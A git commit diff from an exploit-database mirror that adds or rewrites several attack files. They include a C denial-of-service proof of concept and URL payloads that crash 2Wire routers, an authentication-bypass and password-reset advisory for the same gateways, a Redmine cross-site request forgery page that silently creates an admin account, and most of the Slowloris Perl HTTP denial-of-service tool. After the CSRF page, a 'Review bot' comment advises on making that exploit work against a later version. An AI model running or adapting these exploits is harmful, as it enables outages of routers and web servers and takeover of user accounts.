Updated 05_20_2014

This commit is contained in:
Offensive Security 2014-05-20 04:36:33 +00:00
parent 51cca24be3
commit 16eeac4edf
89 changed files with 3715 additions and 4306 deletions

403
files.csv



@ -1,95 +1,95 @@
//Vulnerable:
//2Wire OfficePortal 0
//2Wire HomePortal 1500W
//2Wire HomePortal 100W
//2Wire HomePortal 100S
//2Wire HomePortal 1000W
//2Wire HomePortal 1000SW
//2Wire HomePortal 1000S
//2Wire HomePortal 1000
//2Wire HomePortal 0
////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
//// [ Explanation ] this PoC make an evil_request
//// and send to the server , when the server process
//// it the request fall him, AND THE MODEM WILL RESET!.
////
//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2
//// If you have any error with the librarys you need
//// include libws2_32.a at the project.
////
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)
#pragma comment(lib,"libws2_32.a")
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "winsock2.h"
unsigned long dir;
char h[]="";
short port;
char badreq[]="";
int state;
int main(int argc, char *argv[])
{
printf("\n################################################\n");
printf("####\n");
printf("#### PoC of DoS 2wire_Gateway\n");
printf("#### By Preth00nker\n");
printf("#### http://www.mexhackteam.org\n");
printf("####\n");
printf("####\n\n");
if (argc<4){
printf("[Usage] %s $Host $Port $Variable\n",argv[0]);
printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]);
return 0;
}
//Crear socket
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2),&wsaData);
SOCKET wsck;
//Estructuras
struct sockaddr_in Wins;
struct hostent *target;
//Wins
Wins.sin_family=AF_INET;
Wins.sin_port=htons((short)atoi(argv[2]));
target=gethostbyname(argv[1]);
Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr));
//llamamos al socket
wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL);
//Verifica por error
if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;}
printf("Socket creado correctamente!.. hWndl: %d",wsck);
//Conecta
if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){
WSACleanup();
return 0;
printf("\nError al conectar =!..");
}
printf("\nConectado!..");
//Make a bad query and send it ..Mwajuajua!..
strcat(badreq,"GET /xslt?");
strcat(badreq,argv[3]);
strcat(badreq,"=%0D%0A HTTP/1.0\r\n");
strcat(badreq,"Accept-Language: es-mx\r\n");
strcat(badreq,"User-Agent: MexHackTeam\r\n");
strcat(badreq,"Host: ");
strcat(badreq,argv[1]);
strcat(badreq, "\r\n\r\n\r\n");
send(wsck , badreq ,(int)strlen(badreq), 0);
printf("\nDatos Mandados!..");
//finalized
Sleep(100);
printf("\nThat's all, Check this out!...\n");
WSACleanup();
return 0;
}
//////////////////////////////////////////// [ EOF ]
////////////////////////////////////////////////////
// milw0rm.com [2006-08-22]
//Vulnerable:
//2Wire OfficePortal 0
//2Wire HomePortal 1500W
//2Wire HomePortal 100W
//2Wire HomePortal 100S
//2Wire HomePortal 1000W
//2Wire HomePortal 1000SW
//2Wire HomePortal 1000S
//2Wire HomePortal 1000
//2Wire HomePortal 0
////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
//// [ Explanation ] this PoC make an evil_request
//// and send to the server , when the server process
//// it the request fall him, AND THE MODEM WILL RESET!.
////
//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2
//// If you have any error with the librarys you need
//// include libws2_32.a at the project.
////
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)
#pragma comment(lib,"libws2_32.a")
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "winsock2.h"
unsigned long dir;
char h[]="";
short port;
char badreq[]="";
int state;
int main(int argc, char *argv[])
{
printf("\n################################################\n");
printf("####\n");
printf("#### PoC of DoS 2wire_Gateway\n");
printf("#### By Preth00nker\n");
printf("#### http://www.mexhackteam.org\n");
printf("####\n");
printf("####\n\n");
if (argc<4){
printf("[Usage] %s $Host $Port $Variable\n",argv[0]);
printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]);
return 0;
}
//Crear socket
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2),&wsaData);
SOCKET wsck;
//Estructuras
struct sockaddr_in Wins;
struct hostent *target;
//Wins
Wins.sin_family=AF_INET;
Wins.sin_port=htons((short)atoi(argv[2]));
target=gethostbyname(argv[1]);
Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr));
//llamamos al socket
wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL);
//Verifica por error
if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;}
printf("Socket creado correctamente!.. hWndl: %d",wsck);
//Conecta
if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){
WSACleanup();
return 0;
printf("\nError al conectar =!..");
}
printf("\nConectado!..");
//Make a bad query and send it ..Mwajuajua!..
strcat(badreq,"GET /xslt?");
strcat(badreq,argv[3]);
strcat(badreq,"=%0D%0A HTTP/1.0\r\n");
strcat(badreq,"Accept-Language: es-mx\r\n");
strcat(badreq,"User-Agent: MexHackTeam\r\n");
strcat(badreq,"Host: ");
strcat(badreq,argv[1]);
strcat(badreq, "\r\n\r\n\r\n");
send(wsck , badreq ,(int)strlen(badreq), 0);
printf("\nDatos Mandados!..");
//finalized
Sleep(100);
printf("\nThat's all, Check this out!...\n");
WSACleanup();
return 0;
}
//////////////////////////////////////////// [ EOF ]
////////////////////////////////////////////////////
// milw0rm.com [2006-08-22]


@ -1,34 +1,34 @@
2WIRE ROUTER DSL DENIAL OF SERVICE
VULNERABLE
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51
The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.
PoC: (this can be set in an IMG tag or whatever)
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
http://home...
etc...
hkm
hkm {@} hakim.ws
Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.
# milw0rm.com [2008-11-08]
2WIRE ROUTER DSL DENIAL OF SERVICE
VULNERABLE
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51
The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.
PoC: (this can be set in an IMG tag or whatever)
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
http://home...
etc...
hkm
hkm {@} hakim.ws
Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.
# milw0rm.com [2008-11-08]


@ -1,81 +1,81 @@
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09)
==============================================================
DESCRIPTION
-----------------
There is an authentication bypass vulnerability in page=CD35_SETUP_01 that
allows you to set a new password even if the password was previously set.
By setting a new password with more than 512 characters the password gets
reset and next time you access the router you will be prompted for a new
password.
VULNERABLE
----------------
2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG
Firmware
5.29.51
3.17.5
3.7.1
NOT VULNERABLE
--------------------
Firmware
5.29.135.5 or later
DISCLOSURE TIMELINE
-------------------------
03/27/2009 - 2wire Contacted no satisfactory response
07/11/2009 - Sent complete details to 2wire no response
07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response
08/02/2009 - Made public @ Defcon 17
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net?xslt?page=CD35_SETUP_01
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv
Password Reset - using the same form but sending a password > 512 characters
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv
GREETS
------------
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa
Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield
Comunidad Underground de Mexico : https://www.underground.org.mx
h k m
http://www.hakim.ws
# milw0rm.com [2009-08-12]
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09)
==============================================================
DESCRIPTION
-----------------
There is an authentication bypass vulnerability in page=CD35_SETUP_01 that
allows you to set a new password even if the password was previously set.
By setting a new password with more than 512 characters the password gets
reset and next time you access the router you will be prompted for a new
password.
VULNERABLE
----------------
2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG
Firmware
5.29.51
3.17.5
3.7.1
NOT VULNERABLE
--------------------
Firmware
5.29.135.5 or later
DISCLOSURE TIMELINE
-------------------------
03/27/2009 - 2wire Contacted no satisfactory response
07/11/2009 - Sent complete details to 2wire no response
07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response
08/02/2009 - Made public @ Defcon 17
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net?xslt?page=CD35_SETUP_01
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv
Password Reset - using the same form but sending a password > 512 characters
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv
GREETS
------------
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa
Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield
Comunidad Underground de Mexico : https://www.underground.org.mx
h k m
http://www.hakim.ws
# milw0rm.com [2009-08-12]


@ -45,6 +45,6 @@ int main( void )
fork();
return( 0 );
}
// milw0rm.com [2004-01-06]
}
// milw0rm.com [2004-01-06]


@ -135,6 +135,6 @@ int main(int argc, char **argv)
close(fd);
return 0;
}
// milw0rm.com [2004-01-07]
}
// milw0rm.com [2004-01-07]


@ -407,6 +407,6 @@ int main(void)
return 0;
}
// milw0rm.com [2004-01-15]
// milw0rm.com [2004-01-15]


@ -95,6 +95,6 @@ int main( void )
return( 0 );
}
// milw0rm.com [2004-02-18]
// milw0rm.com [2004-02-18]


@ -295,6 +295,6 @@ int main(int ac, char **av)
}
return 0;
}
// milw0rm.com [2004-03-01]
}
// milw0rm.com [2004-03-01]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37277/info
Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions.
Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks.
Successful exploits will result in the complete compromise of affected computers.
http://www.exploit-db.com/sploits/33395.tgz


@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/37322/info
Ruby on Rails is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
/**
* Redmine <= 0.8.6 CSRF Add Admin User Exploit
* Discovered by: p0deje (http://p0deje.blogspot.com)
* Application: http://www.redmine.org/wiki/redmine/Download
* SA: http://www.redmine.org/news/30
* Date: 13.11.2009
* Versions affected: <= 0.8.6
* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
*/
<html>
<body>
<form method=POST action="http://www.example.com/users/new">
<input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
<input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
<input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
<input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
<input style="display: none" type="hidden" value="1" name="user[admin]"/>
<input style="display: none" type="submit" value="Create" id="commit" name="commit" />
</form>
<script>document.getElementById("commit").click();</script>
</body>
</html>
/**
* P.S. Actually, this vulnerability wasn&#039;t fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
* Thus, you can add POST data with token of any user and exploit will be working again
*/
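Review bot: The checkbox `<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>` carries no `checked` attribute, so a browser never submits it; the admin flag is set entirely by the hidden `user[admin]=1` input on the next line, and that line deserves a comment such as `<!-- hidden field does the work: an unchecked checkbox is not submitted -->` so the apparent duplicate is not removed later. `http://www.example.com/users/new` is a placeholder that has to be replaced with the target Redmine's base URL before the page is served to a logged-in administrator. The trailing note says 0.8.7 still accepts any user's token, but the form as written sends no `authenticity_token` field at all, so against 0.8.7 an attacker would presumably need to add one with a captured value — worth stating next to the form rather than only in the postscript.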


@ -1,466 +1,466 @@
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighthttpd, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
